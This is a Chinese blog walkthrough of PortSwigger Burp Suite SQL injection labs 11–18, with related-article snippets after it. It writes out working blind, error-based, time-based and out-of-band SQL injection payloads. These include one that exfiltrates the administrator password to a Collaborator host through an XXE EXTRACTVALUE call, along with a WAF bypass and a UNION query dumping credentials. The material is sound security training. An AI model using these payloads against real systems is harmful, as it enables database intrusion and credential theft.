burp靶场sql注入通关—下

最新推荐文章于 2025-03-29 00:00:00 发布
最新推荐文章于 2025-03-29 00:00:00 发布
阅读量1.6k 收藏 25
点赞数 41
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Zqinglele/article/details/137817345
版权

第十一关(布尔盲注):

1.根据提示修改包含 TrackingId cookie的请求,先抓包并修改这个值,在后面加上永真式发现出现Welcome back

TrackingId=xxxx' and '1'='1

  再修改这个值为永假式看看,发现没有Welcome back,有两种是或不是回显说明是布尔类型的

2.利用是否有正确回显判断后面语句是否正确,出现Welcome back说明存在users表

TrackingId=xxxx' and (select 'a' from users LIMIT 1)='a

3.确定users表中是否存在administrator用户

TrackingId=xxxx' and (select username from users where username='administrator')='administrator

4.判断密码的长度,根据提示可知密码只包含小写字母和数字

TrackingId=xxxx' and (select username from users where username='administrator' and LENGTH(password)>2)='administrator

最终尝试出来密码长度为20

5.接下来测试出每位密码的值

TrackingId=xxxx' and (select substring(password,1,1) from users where username='administrator')='a

  最后得到密码为:2j1255423gxam09ettyx

6.使用该密码登录即可通关

第十二关(条件错误的盲注):

1.有题目可知这关是有错误回显的,先抓包对TrackingId值测试,出现报错说明不是单引号闭合

  再加一个单引号不报错了,说明是双引号闭合

2.确定是否存在注入点,需要使用有效的SQL语法构造一个查询

TrackingId=xxxx'||(select '' from dual)||'

  返回一个不存在的表名,这时出现了错误回显,说明存在错误注入

测试根据特定条件的真值有条件地触发错误

'||(select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'            报错

'||(select CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'            不报错

CASE语句:如果条件(when)为真,则计算前一个(then)表达式;如果条件为假,则计算后一个(else)表达式。

3.确定数据库中是否存在users表

TrackingId=xxxx'||(select '' from users where rownum=1)||'

4.确定users表中是否存在administrator用户,报错说明存在

TrackingId=xxxx'||(select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

因为from后的语句正确,所以执行when;when一定正确,所以执行then出现错误

5.确定密码的长度

TrackingId=xxxx'||(select CASE WHEN length(password)>1 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' 

=20报错且>20不报错,说明密码长度为20

6.接下来测试出每位密码的值

TrackingId=xxxx'||(select CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

   整理得到密码为:ydyo5oe5ops0k8ttwt25

6.使用该密码登录即可通关

第十三关(可见错误的盲注):

1.首先在Proxy—HTTP history里找到包含TrackingId的GET类型的数据包

2.判断是否存在注入点,出现对SQL语句的报错,注释后恢复正常,说明存在报错注入

3.调整使用select查询,并将返回值转换为int型

TrackingId=xxxx'+AND+CAST((SELECT+1)+AS+int)--

4.错误提示需要将payload更改为布尔类型,这次没有出现错误提示

TrackingId=xxxx'+AND+1=CAST((SELECT+1)+AS+int)--

5.从users表确定是否存在administrator用户,发现又出现错误

6.再根据提示出现未预料到的字符串,将TrackingID值删去

TrackingId='+AND+1=CAST((SELECT username FROM users)+AS+int)--

7.又出现错误说超过一行,再修改payload,结果回显说明存在administrator

TrackingId='+AND+1=CAST((SELECT username FROM users LIMIT 1)+AS+int)--

8.从users表中获得administrator的密码

TrackingId='+AND+1=CAST((SELECT password FROM users LIMIT 1)+AS+int)--

9.利用得到的密码登录即可通关

第十四关(时间延迟的盲注):

1.这关需要制造10秒的延迟,首先抓包测试是否存在注入点,发现是由单引号闭合的

2.利用sleep函数让网页延迟10秒即可通过

TrackingId=xxxx'|| pg_sleep(10)--

第十五关(时间延迟和信息检索的盲注):

1.这关需要触发条件时间延迟来推断信息,首先判断是否存在sql注入点,睡眠了5秒说明存在

验证应用程序是否立即响应,没有时间延迟,这样测试单个布尔条件并推断结果

TrackingId=xxxx'|| select CASE WHEN (1=2) THEN pg_sleep(10) ELSE pg_sleep(0) END--

2.判断users表中是否有用户为administrator

TrackingId=xxxx'||(select CASE WHEN (username='administrator') THEN pg_sleep(5) ELSE pg_sleep(0) END from users)--

3.确定administrator密码的长度,最后得到密码长度为20

TrackingId=xxxx'||(select CASE WHEN (username='administrator' and length(password)>1) THEN pg_sleep(5) ELSE pg_sleep(0) END from users)--

4.接下来测试出每位密码的值

TrackingId=xxxx'||(select CASE WHEN (username='administrator' and substring(password,1,1)=''a) THEN pg_sleep(5) ELSE pg_sleep(0) END from users)--

最后得到密码为:v7xdghg0xwm530oh8vbs

5.使用该密码登录即可通关

第十六关(外带交互的盲注):

1.这关由于SQL查询是异步执行的,对应用程序的响应没有影响,可以通过触发与外部域的外带交互来进行注入

   首先对Burp Collaborator进行DNS查询,其中Collaborator相当于外部服务器

2.构造payload利用extractvale函数报错将xml数据外带

TrackingId=xxxx' union select EXTRACTVALUE(xmltype('<%3fxml version%3d"1.0" encoding%3d"UTF-8"%3f><!DOCTYPE root [+<!ENTITY %25 remote SYSTEM "http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

划线部分填上一步复制的DNS

3.在collaborator看到执行payload后产生的信息

第十七关(外带数据渗出的盲注):

1.这关需要找到administrator的密码,还是先打开服务器端

2.构造payload将密码爆出

TrackingId=xxxx'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT password FROM users WHERE username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

3.复制得到的密码进行登录即可通关

第十八关(XML编码绕过):

1.这关需要获取管理员用户的凭据并登录,使用 Hackvertor 扩展绕过WAF

   先点击一个商品,根据提示抓check stock的包

2.接下来判断在storeID处是否存在注入点,可以发现库存减少了变为ID=2的商品的,说明存在注入点

3.尝试使用联合查询确定返回的列数,被发现存在攻击

4.安装插件Hackvertor

5.将数据包利用Hackvertor编码,这样就不会显示被攻击

6.从users表中获取administrator密码

1 union select username || '~' || password from users

7.使用获得的账号密码即可通关

季柳东
关注
burp靶场sql注入通关—上
Zqinglele的博客
04-30 1476
'+union+select+'abc','def'+from+dual-- 没有报错说明两列都是字符型。1.这关要确定该表的名称及其包含的列,然后检索表的内容以获取所有用户的用户名和密码,并以管理员用户身份登录。'+union+select+'abc','def'-- 不报错,说明有两列。'+union+select+'abc','def'%23 不报错。'+union+select+'abc','def','ghi'%23 报错。
burp 官方靶场 第二章 sql注入
2301_78362619的博客
02-01 1399
要在每个位置测试字符,您需要在您定义的有效负载位置发送合适的有效负载。或者,您可以创建一个具有两个有效载荷位置和“集束炸弹”攻击类型的单个入侵者攻击,并通过偏移量和字符值的所有排列进行工作。现在,您只需对密码中的其他每个字符位置重新运行攻击,以确定它们的值。为此,请返回到主Burp窗口和Burp Intruder的Positions选项卡,并将指定的偏移量从1更改为2。当条件不再为真时(即“欢迎回来”消息消失时),您已经确定了密码的长度,实际上是20个字符长。该行显示的有效载荷是第一个位置的字符的值。
Burp Suite抓包实战:SQL注入漏洞挖掘
最新发布
水务人
03-29 2021
本文系统解析如何利用Burp Suite专业版开展SQL注入漏洞的定向挖掘,涵盖手动探测、自动化利用、WAF绕过等进阶技巧。通过电商、金融等行业的真实渗透案例,详解从流量拦截到漏洞利用的全链路方法论,实现单日最高挖掘23个高危注入点的实战成果。
精通Burpsuite:SQL注入测试的实验操作步骤详解
weixin_43822401的博客
05-25 1904
在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过注入恶意SQL代码来操纵后端数据库Burpsuite作为一款领先的Web安全测试工具,提供了一系列的功能来帮助安全专家发现和防御这类漏洞。本文将详细介绍如何使用Burpsuite进行SQL注入测试的实验操作步骤。通过遵循这些详细的实验操作步骤,安全专家可以更有效地使用Burpsuite进行SQL注入测试。通过本文的指导,读者应该能够掌握使用Burpsuite进行SQL注入测试的关键步骤,提升自己的安全测试能力。
利用Burpsuite精通SQL注入测试
weixin_43822401的博客
07-13 1291
SQL注入攻击是Web安全领域最常见且危害极大的漏洞之一。Burpsuite作为一款强大的Web安全测试工具,提供了一系列的功能来帮助安全专家发现并防御SQL注入。本文将详细介绍如何使用Burpsuite进行SQL注入测试,包括POST方式的注入、盲注技术以及HTTP头注入等高级技巧。Burpsuite是一款集成了多种Web安全测试功能的软件,它支持多种操作系统,包括在Kali Linux中的免费版本。通过代理服务器的功能,Burpsuite能够拦截、分析和修改HTTP请求和响应。
使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件
dzqxwzoe的博客
03-19 2086
每次测注入都是用burp的Intruder模块,很不方便就是批量跑批量测哪些没有过滤懒人鹅上线,准备搞一个sql测试的插件本篇文章代码量大,基础可以去看上一篇。
绕过登录的万能密码 SQL 注入
杳若的博客
08-15 388
绕过登录的万能密码 SQL 注入
SQL注入:pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4116
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
sql注入靶场通关
xiaoyang0475的博客
07-03 1382
打开小皮,并打开Apache2.4.39 和 MySQL5.7.26打开网站创建网络 域名为sqli-labs 端口为8989 PHP版本5.3.29 根目录与WWW文件在同一路径,进行创建。打开创建好的网站打开网站就可以进行sqli-labs靶场通关啦接下来让我们开始进行打靶吧!输入正常数据查看回显通过判断是否存在注入点和注入类型来进行打靶判断注入点?id=1查看是否存在注入点确定存在注入点将后面进行注释查看页面回显页面回显正常判断注入方式为字符型注入
SQL注入-靶场通关 Less 1-21
weixin_72104324的博客
07-03 1241
打开Burp工具--打开内嵌浏览器--进入靶场第六关--打开拦截--输入?id=1',如果是正确的,说明不存在注入点,如果错误,说明存在注入点,这里是错误的,需要加上注释--+,在回车看结果是正确的,说明找到了注入点。工具,打开内嵌浏览器,打开拦截,输入http://127.0.0.1/sqli-labs-master/Less-9,然后发送到。id=1'--+,后面都注释了,单引号不闭合,报错说明是数字型SQL注入。设置休眠时间为10s,如果执行SQL语句就会加载,说明正确,存在注入点。
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6125
BurpSuit官方实验室靶场-SQL注入通关记录。
sqli-labs SQL注入靶场通关手册
2302_78345978的博客
05-18 1820
在name=后加上'and (length(database())=8)--+发送到重映器,进行修改:首先在User-Agent后加 ’ 查看报错信息。因为cookie需要登录才能验证,所以放行,后刷新页面,抓取cookie。进行HTTP User-Agent 注入,选择less-18。进行post传参无回显的布尔类型盲注,选择less-15。(输入账号密码,提交后,在burp上查看截获的数据)先猜数据库名字长度,>=8时不报错,>=9时报错。进行post传参的字符型注入,选择less-13。
sql注入sqli-labs第一关
nixiaoge的博客
08-05 1161
注入:都是合理合法的MySQL执行语句产生的原因:对于输入没有做过滤,导致意外的查询语句进到了程序中,查询出来了本不应该查询的数据。
sqllab 第一关
aliexiansheng的博客
10-22 575
一、正常访问 判断是否存在注入 http://127.0.0.1/sqllab/Less-1/?id=1' 标白部分为实际的报错内容,可以看出因为写入的’拼接到语句中造成原语句的单引号多余,导致报错。 通过添加的 – + 注释掉后续查询语句,达到语句正常执行的目的 二、猜解当前数据库列数以及页面中的显示位置 http://127.0.0.1/sqllab/Less-1/?id=1'order by 1 --+ http://127.0.0.1/sqllab/Less-1/?id=1'order by 2
Burp靶场sql注入漏洞
xy_wjyjw的博客
11-23 1175
您可以使用一组针对应用程序中每个入口点的系统测试来手动检测 SQL 注入。OR 1=1OR 1=2或者可以使用 Burp Scanner 快速可靠地找到大多数 SQL 注入漏洞。
工具分享 | xia_sql - BurpSuite插件,主要用于判断SQL注入漏洞,多个SRC赏金挖掘大佬都在使用。
IT软件汇
09-10 1066
工具分享 | xia_sql是一款BurpSuite插件,主要用于判断SQL注入漏洞,多个SRC赏金挖掘大佬都在使用。
BurpSuite教程——渗透测试第一关:BP工具使用
goldfish8848的博客
08-04 2602
BurpSuite的核心功能是Proxy——“代理”。代理模块主要用于拦截浏览器的http会话内容,给其他模块功能提供数据。Proxy向下又分为四个部分:Intercept、HTTP history、Websockets history、options。
burpsuite靶场SQL注入总结
向阳-Y.的博客
03-28 6583
burpsuite靶场SQl注入笔记~
SQL注入插件-xia_sql(一)
SuperherRo的博客
08-23 5153
xia SQL (瞎注) burp 插件 ,在每个参数后面填加一个单引号,两个单引号,一个简单的判断注入小插件。
dvwa靶场sql通关教程
02-27
### DVWA SQL Injection Level Walkthrough Tutorial In the Damn Vulnerable Web Application (DVWA), the SQL Injection vulnerability can be explored through various security levels, starting from low to high. For a basic understanding of how this works at the lowest difficulty setting: The application allows users to input data into fields such as 'Username' and 'Password'. When these inputs are not properly sanitized or validated before being used within an SQL query, attackers may exploit this weakness by injecting malicious code directly into those parameters[^1]. For instance, when attempting authentication with crafted entries like `admin' --` in both username and password boxes, it effectively terminates the string comparison operation early due to comment syntax (`--`) causing any subsequent characters including closing quotes to become comments rather than part of executable commands. To verify whether successful exploitation has occurred after submitting altered credentials: - Observe if login succeeds without matching actual stored passwords. - Check database logs for evidence of injected queries that bypassed intended logic checks. A practical demonstration involves using Burp Suite Proxy tool which helps intercept HTTP requests between browser client sessions and server responses allowing manual modification prior submission back towards target web service endpoint under test conditions only. ```sql SELECT * FROM users WHERE user = 'admin' -- ' AND password = '' ``` This example shows what happens behind the scenes where everything following `--` is treated as a comment thus ignoring the rest of the original statement structure leading up until end delimiter; thereby granting unauthorized access based purely on malformed parameter values provided during form submissions.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值